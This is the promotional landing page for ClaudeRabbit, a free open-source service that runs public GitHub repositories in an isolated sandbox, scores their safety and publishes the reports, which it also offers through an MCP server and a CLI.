Open source ships malware, too.
ClaudeRabbit is a free, open-source security product for the developer community. Paste any public GitHub repo and we clone it into an isolated sandbox, run it for real, and hand back one honest safety score: what the project is, what it did when we ran it, and what we could not verify.
The danger board
The lowest-scoring repositories we’ve flagged, named and ranked as they change.
We protect the world from open-source malware.
ClaudeRabbit is a real security product — free and open-source — with one mission: protect the world from open-source malware, and grow from there toward cybersecurity more broadly. We start where the threat is most personal: the developers who clone and run unknown code every day. A repo or package can run hostile code the moment you install it, draining GitHub tokens, cloud keys, and crypto wallets before a build even finishes. More than 454,600 new malicious open-source packages appeared in 2025 — up 75% in a year — and the attacks that matter carry no CVE at all; they only exist at runtime. So we run the code: every scan clones the repo into a disposable, isolated sandbox, executes it, and watches what it actually does.
It is a public good. Every scan we finish becomes a permanent public report, growing a shared, vetted-repo database that belongs to the whole community — never locked behind a paywall. Signing in only saves your history and adds to that shared record; it never buys you more.
Use it everywhere you already work.
The web report is one surface. ClaudeRabbit also ships as an MCP server and a CLI, so the same honest, evidence-backed verdict is one call away — from an AI coding tool, a terminal, or a pre-install hook — without ever leaving where you already are.